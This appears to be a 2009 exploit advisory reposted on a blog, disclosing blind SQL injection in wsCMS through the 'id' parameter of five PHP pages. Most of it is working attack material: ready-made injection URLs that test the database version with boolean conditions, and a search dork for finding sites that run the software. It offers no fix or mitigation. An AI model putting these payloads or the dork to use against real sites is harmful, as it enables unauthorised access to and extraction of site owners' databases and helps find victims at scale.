Home vulnerabilities wsCMS Blind SQL Injection Vuln

wsCMS Blind SQL Injection Vuln

By
Friday, April 17, 2009
Read
Add Comment

[o] wsCMS Blind SQL Injection Vulnerability
Software : wsCMS
Vendor   : http://www.websolutions.ca/
Author   : NoGe


[o] Vulnerable file
gallery.php
programs.php
news.php
stories.php
events.php

all file above affected by "id" parameter


[o] Exploit
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by wsCMS"


[o] Note
this a private script


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us